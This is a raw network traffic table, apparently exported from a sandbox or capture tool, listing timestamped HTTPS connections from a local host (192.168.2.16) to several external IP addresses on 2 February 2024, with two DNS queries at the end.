                                                                                                                          Feb 2, 2024 20:18:26.209744930 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.209826946 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.209868908 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.209914923 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.262474060 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.262742996 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.549973011 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.550210953 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.550295115 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.550574064 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.550591946 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.569956064 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.570286989 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.570399046 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.570481062 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.570521116 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.606333017 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.606467009 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.606532097 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.606549025 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.606796026 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.606849909 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.607389927 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.607398987 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.714073896 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.714175940 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.714262962 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.714469910 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.714498043 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.962313890 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.962887049 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.962950945 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.963345051 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.963644981 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.963723898 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.963834047 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.963872910 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:27.385406017 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:27.385540009 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:27.385703087 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:27.385740995 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:27.385811090 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:27.385869026 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:27.393569946 CET49828443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:27.393604040 CET44349828104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.105540991 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.105634928 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.105788946 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.106003046 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.106024981 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.353631020 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.354734898 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.354782104 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.355451107 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.356018066 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.356128931 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.356544971 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.356587887 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.356606007 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.356614113 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.776868105 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.777003050 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.777096987 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.777133942 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.777219057 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.777271032 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.778554916 CET49829443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.778573036 CET44349829172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.781512976 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.781603098 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.781685114 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.781976938 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:28.782015085 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.788225889 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.788268089 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.788356066 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.788688898 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.788729906 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.788794041 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.788942099 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:28.788961887 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.789025068 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:28.789427996 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.789458990 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.789572954 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:28.789613008 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:28.789805889 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:28.789829969 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.030885935 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.031167030 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:29.031204939 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.031547070 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.031841040 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:29.031900883 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.031991959 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:29.032013893 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096066952 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096067905 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096357107 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.096417904 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096534967 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.096565008 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096798897 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.096939087 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.097083092 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.097157955 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.097295046 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.097357988 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.097460032 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.097500086 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.140800953 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.147573948 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.157207012 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.157238960 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.157840967 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.158258915 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.158348083 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.211596966 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.432789087 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.432899952 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.433000088 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:29.434122086 CET49830443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:29.434165001 CET44349830172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657166004 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657243013 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657299042 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657332897 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657347918 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.657356024 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657403946 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.657445908 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.657445908 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.658015013 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658075094 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658096075 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658096075 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.658107042 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658143044 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658149004 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.658158064 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658193111 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.658617973 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658637047 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658674955 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.658684969 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.658735991 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.673784018 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.673820019 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.673928022 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.674438953 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:29.674465895 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.674530983 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:29.676074028 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:29.676089048 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.676268101 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:29.676281929 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.682410955 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:29.682449102 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.682543993 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:29.683213949 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:29.683226109 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.684948921 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.684989929 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.685046911 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.685066938 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.685406923 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.685436010 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.685465097 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.685477972 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.685532093 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.685544014 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.686072111 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.686093092 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.686125994 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.686140060 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.686196089 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.686206102 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.686261892 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.688716888 CET49831443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.688739061 CET44349831104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.697407961 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.697453022 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.697523117 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.698057890 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.698151112 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.698520899 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.698538065 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.941555023 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.941875935 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.941935062 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.942394018 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.947118044 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.947211981 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.947278023 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.947695017 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.947782993 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.949531078 CET49832443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.949547052 CET44349832104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:29.950248003 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:29.950294018 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.003866911 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.004219055 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:30.004235029 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.005383968 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.005703926 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:30.005882978 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.009953022 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.010195017 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:30.010226011 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.012322903 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.012631893 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:30.012835026 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.013860941 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.014058113 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:30.014086008 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.015336990 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.015607119 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:30.015784025 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.056490898 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:30.056493044 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:30.056498051 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:30.352889061 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.352957964 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:30.353025913 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:30.353734970 CET49837443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:30.353770971 CET44349837104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.028388977 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.028495073 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.028563023 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:34.550322056 CET49833443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:34.550393105 CET4434983313.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.892860889 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.893004894 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.893174887 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:34.897407055 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.897572041 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.897747993 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:34.899806976 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.899928093 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:34.900023937 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:36.537734032 CET49835443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:36.537782907 CET49836443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:36.537807941 CET4434983513.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:36.537815094 CET49834443192.168.2.1613.107.213.41
                                                                                                                          Feb 2, 2024 20:18:36.537838936 CET4434983413.107.213.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:36.537862062 CET4434983613.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:37.973789930 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:18:37.973846912 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:38.428284883 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:38.428402901 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:38.428678036 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:38.538741112 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:38.538801908 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.778569937 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:44.778642893 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.778776884 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:44.779156923 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:44.779179096 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.996145010 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.996537924 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:44.996602058 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.997276068 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:44.997669935 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:44.997783899 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:45.048460960 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:53.166152954 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:53.166331053 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:53.166429043 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:18:54.543767929 CET49780443192.168.2.16152.199.4.44
                                                                                                                          Feb 2, 2024 20:18:54.543822050 CET44349780152.199.4.44192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:55.000536919 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:55.000696898 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:55.000883102 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:56.542742014 CET49840443192.168.2.16142.250.105.99
                                                                                                                          Feb 2, 2024 20:18:56.542813063 CET44349840142.250.105.99192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:07.197917938 CET49714443192.168.2.1623.220.189.216
                                                                                                                          Feb 2, 2024 20:19:07.299700975 CET4434971423.220.189.216192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:07.299781084 CET4434971423.220.189.216192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:07.299971104 CET49714443192.168.2.1623.220.189.216
                                                                                                                          Feb 2, 2024 20:19:07.299971104 CET49714443192.168.2.1623.220.189.216
                                                                                                                          Feb 2, 2024 20:19:07.869774103 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:19:07.869811058 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:09.846086025 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:09.846191883 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:09.846286058 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:09.846956968 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:09.846991062 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.064436913 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.064960003 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.065020084 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.065577030 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.065671921 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.066629887 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.066703081 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.068124056 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.068216085 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.068403959 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.068420887 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.107877970 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.277610064 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.278971910 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:10.279090881 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.279279947 CET49843443192.168.2.16142.250.105.100
                                                                                                                          Feb 2, 2024 20:19:10.279303074 CET44349843142.250.105.100192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:22.860721111 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:22.860912085 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:19:22.861118078 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:19:24.534534931 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:19:24.534554958 CET4434981835.181.229.138192.168.2.16
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Feb 2, 2024 20:17:40.279097080 CET5258053192.168.2.161.1.1.1
                                                                                                                          Feb 2, 2024 20:17:40.279196024 CET6293153192.168.2.161.1.1.1
